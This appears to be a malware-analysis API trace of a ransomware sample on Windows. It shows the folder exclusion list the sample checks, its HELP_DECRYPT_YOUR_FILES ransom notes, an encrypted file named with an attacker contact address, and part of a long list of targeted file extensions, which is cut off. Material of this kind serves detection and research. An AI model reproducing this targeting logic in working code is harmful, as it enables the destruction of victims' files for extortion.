	[0175.825] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*") returned 0x61
	[0175.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.825] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0175.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.825] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0175.825] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.826] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0175.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.826] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.826] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0175.826] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.826] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0175.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.827] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.827] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0175.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.827] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0175.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.828] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0175.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.828] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0175.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.828] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0175.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.828] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.829] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.829] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0175.829] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.829] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0175.829] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.829] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0175.829] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.830] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0175.830] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.830] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0175.830] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.830] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0175.830] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0175.830] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0175.830] FindNextFileW (in: hFindFile=0xfb90f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x824229fa, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="..", cAlternateFileName="")) returned 1
	[0175.831] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0175.831] FindNextFileW (in: hFindFile=0xfb90f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824229fa, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x824229fa, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x824229fa, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0175.831] FindNextFileW (in: hFindFile=0xfb90f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x823d6838, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x823d6838, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x824229fa, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0175.831] FindNextFileW (in: hFindFile=0xfb90f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0eac9f1, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0eac9f1, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0eac9f1, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x734, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0175.831] FindNextFileW (in: hFindFile=0xfb90f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ed2c64, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ed2c64, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0ef8ed0, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x732, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1
	[0175.831] FindNextFileW (in: hFindFile=0xfb90f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ed2c64, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ed2c64, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0ef8ed0, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x732, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 0
	[0175.831] FindClose (in: hFindFile=0xfb90f0 | out: hFindFile=0xfb90f0) returned 1
	[0175.832] FindClose (in: hFindFile=0xfb90f0 | out: hFindFile=0xfb90f0) returned 0
	[0175.832] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82363f94, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82363f94, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82363f94, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 1
	[0175.832] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82363f94, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x82363f94, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x82363f94, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 0
	[0175.832] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0175.832] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0175.833] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0175.833] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0175.833] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0175.833] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", cAlternateFileName="{FC01E~1")) returned 1
	[0175.834] lstrcmpW (lpString1="{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", lpString2="..") returned 1
	[0175.834] lstrcmpW (lpString1="{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", lpString2=".") returned 1
	[0175.834] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0175.834] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
	[0175.834] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\", lpString2="{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}"
	[0175.834] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}"
	[0175.834] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\"
	[0175.834] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\"
	[0175.834] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*"
	[0175.834] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0175.848] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*") returned 84
	[0175.848] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.849] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*") returned 0x54
	[0175.849] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.849] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="windows") returned 0x0
	[0175.849] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.849] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="boot") returned 0x0
	[0175.849] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.850] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="system volume information") returned 0x0
	[0175.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.850] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.850] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="temp") returned 0x0
	[0175.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.850] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="program files") returned 0x0
	[0175.850] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.851] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0175.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.851] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="appdata") returned 0x0
	[0175.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.851] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="application data") returned 0x0
	[0175.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.851] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="winnt") returned 0x0
	[0175.851] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.852] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="tmp") returned 0x0
	[0175.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.852] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="cache") returned 0x0
	[0175.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.852] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0175.852] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.852] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="webcache") returned 0x0
	[0175.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.853] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="inetcache") returned 0x0
	[0175.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.853] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="nvidia") returned 0x0
	[0175.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.853] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="packages") returned 0x0
	[0175.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.855] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="cookies") returned 0x0
	[0175.855] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.855] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\*.*", lpSrch="programdata") returned 0x0
	[0175.855] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0175.855] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa9d106f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xaa9d106f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaa9d106f, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x6eb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1
	[0175.856] lstrcmpW (lpString1="customizations.xml", lpString2="..") returned 1
	[0175.856] lstrcmpW (lpString1="customizations.xml", lpString2=".") returned 1
	[0175.856] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\"
	[0175.856] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\", lpString2="customizations.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml"
	[0175.856] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml") returned 99
	[0175.856] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.856] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml", cchLength=0x63 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml") returned 0x63
	[0175.856] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.857] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0175.857] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml"
	[0175.857] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\customizations.xml") returned 99
	[0175.857] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.857] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.857] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0175.857] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.858] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.i